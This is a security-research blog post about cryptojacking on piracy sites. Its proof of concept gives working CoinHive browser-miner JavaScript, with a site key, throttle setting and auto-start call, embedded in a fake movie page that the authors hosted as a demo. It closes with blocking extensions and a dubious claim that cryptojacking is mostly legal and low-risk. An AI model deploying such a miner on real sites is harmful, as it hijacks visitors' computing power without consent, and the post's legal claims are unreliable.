A Must Read for those who Watch Pirated Movies or Download Pirated Softwares Online | Lucideus Research

There are thousands of sites providing facility to watch pirated movies online. There was an era where all these sites used to generate money from advertisements and affiliation programs. Today the world has changed, now most of these torrent and other online pirated movies are shifting their money making agenda from traditional advertisement, spyware and adware  to a new term known as Crypto-Jacking.

Crypto-Jacking
CryptoJacking is the process in which hacker manages to use the victims computing power in order mine cryptocurrency which is known as Crypto-Mining. So how this crypto-mining works and how to earn money from it.

How you earn money from Crypto-Mining
Step 1
Provide bookkeeping services to the coin network. Mining is essentially 24/7 computer accounting called 'verifying transactions'.
Step 2
Get paid a small reward for your accounting services by receiving fractions of coins every couple of days.
Step 3
Keep your personal costs down, including electricity and hardware.

What is required to run the show
1 A Private database
2 Free Mining Software Package
3 Membership in an online mining pool
4 Membership in an online currency exchange
5 Reliable full-time internet connection
6 A powerful computer
7 A Hardware setup location
8 ATI or NVIDIA graphics GPUs
9 A House Fan

So What's the catch?
The catch is that a person can recoup $1000 in hardware costs in about 18-24 months.
The profit from mining crypto coins only becomes significant when someone is willing to invest $3000-$5000 in up-front hardware costs, at which time you could potentially earn $50 per day or more. So the solution cybercriminals have developed is to use reduce the hardware cost by using portal visitor's CPU.

Taking an example of a tweet where on 2nd Dec 2017, when Noah Dinkin found that Starbuck's in-store wifi was mining bitcoins via customer's laptop.

There are many examples of this when organisations and cybercriminals are using hardware consumption of users who are using their services online or on the network. There are many techniques Crypto-Jacking is being used by hackers and cybercriminals all around the world.

Embedded JavaScript
Embed, control and get status information from the JavaScript miner on your webpage.

HTTP API
Verify tokens, get and withdraw user balances and programmatically create short links.

Wordpress Plugins
Third-party plugins for easy integration into your WordPress site. Note that these are in official plugins
and we cannot offer technical support.

AuthedMine
A version of a miner that is not blocked by adblockers but requires an explicit 
opt-in from the end-user.

CAPTCHA
Display, customise and verify the Proof Of Work Captcha.

WiFi
There is also a method to inject the payload in wifi to mine cryptocurrency
                        
                                                     Proof of Concept

We decide to have an experiment to design a fake movie site page and add our demo Crypto-jacking Crypto-mining javascript.

Step 1: Making an account on CoinHive

Step 2: Setup A Monero Wallet to get your deposits to into and add it to.

Step 3: Payment settings


Step 4: Making a Dummy site and Integrating JS to mine crypto by using JS CDN/API


Step 5: Save and open the HTML Page



Step 6: To See Java Script Logs: Open Developer Console >Inspect element>Console



Note the return would be higher if you open it on a supercomputer the attacker could make couple thousand dollars in few hours.

Code Understanding
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
The above link calls the cdn/api in the browser and calls it

var miner = new CoinHive.Anonymous('M2nI9Xf6ScnszjPsKV3tOQNedJBMgBuT', {throttle: 0.3});
M2nI9Xf6ScnszjPsKV3tOQNedJBMgBuT is your site key it is provided by coinhive when you setup your account throttle: 0.3 means that it will start after 0.3 second of loading.

miner.start();
The mining process will start as soon as the miner.start() function is called in the browser.

miner.on('found', function() {console.log("found Hash")})
miner.on('accepted', function() {console.log(" Hash accepted by the pool(coinhive)") })
So in Mining, the CPU tries to guess key of the algorithms that are being carried out to secure the currency in the blockchain Hashing power or hashing rate is the number of keys that are guessed by CPU

Every time a hash is found it means that the key of the hash got guessed and if there was some 
transaction it would go through some small network (pool)of blockchain eg a transaction gets through a 
the pool of miners which means there some computer CPU was in the pool which carried out the transaction.

Every Time a transaction is done on blockchain through pool small amount of currency is rewarded to the miners in the pool. 
setInterval(function() {
var hashesPerSecond = miner.getHashesPerSecond();
var totalHashes = miner.getTotalHashes();
var acceptedHashes = miner.getAcceptedHashes();

console.log("hashesPerSecond",hashesPerSecond);
console.log("totalHashes",totalHashes);
console.log("acceptedHashes",acceptedHashes);

console.log("___________________");
console.log("___________________");
}, 1000);
The above function has variable that callgetHashesPerSecond(),getTotalHashes,getAcceptedHashes() 
functions and stores the value in variable hashesPerSecond, totalHashes, acceptedHashes and then logs it out basically the above function was for my understanding if anyone chooses to opt out then there would  not be any problem as the mining would start  as soon as the miner.start() is called ,console.log("___________________") was used to separate as the rates would refresh every 1000 milisecond(second).

Real Life Scenarios

Some Sites like above actually go out and give the option to the user to either allow or cancel the use of computing power to mine cryptocurrency. This might be the future of monetisation where advertisements are not required to make money instead the website would use the computing power of users to make money and survive, this could be the new internet or so-called INTERNET OF VALUE.

            Here is our another demo webpage we made by adding the CoinHive JavaScript.
                     http://downloadfreemoviescryptjackexamples.000webhostapp.com/


Here below we can see the effect on CPU processing in Activity Monitor or Windows Task Manager as we open the page in our browser.

Protect Yourself from Crypto-Jacking
There are many ways to block these crypto mining javascript. Here are few we found good Extensions you can use to know and block these minimum scripts with minimum effort.

  1. NoCoin : https://chrome.google.com/webstore/detail/no-coin/gojamcfopckidlocpkbelmpjcgmbgjcl?hl=en
  2. minerBlock: https://chrome.google.com/webstore/detail/minerblock/emikbbbebcdfohonlaifafnoanocnebl?hl=en

Conclusion: Future belongs to cyber criminals when it comes to anonymous money generation as generating money from services like Crypto-Jacking does not make someone criminal by law in the majority of countries. It's not a traditional crime where you hack into credit card or steal some one's personal data which will potentially put you behind bars if proven. This is 2018 and in upcoming year we surely will see crypto-jacking will become one of the top money-making technique without getting into much trouble when it comes to law-enforcement policies. With these kinds of techniques, Cyber World has become already a Hacker's Paradise today.







No comments:

Powered by Blogger.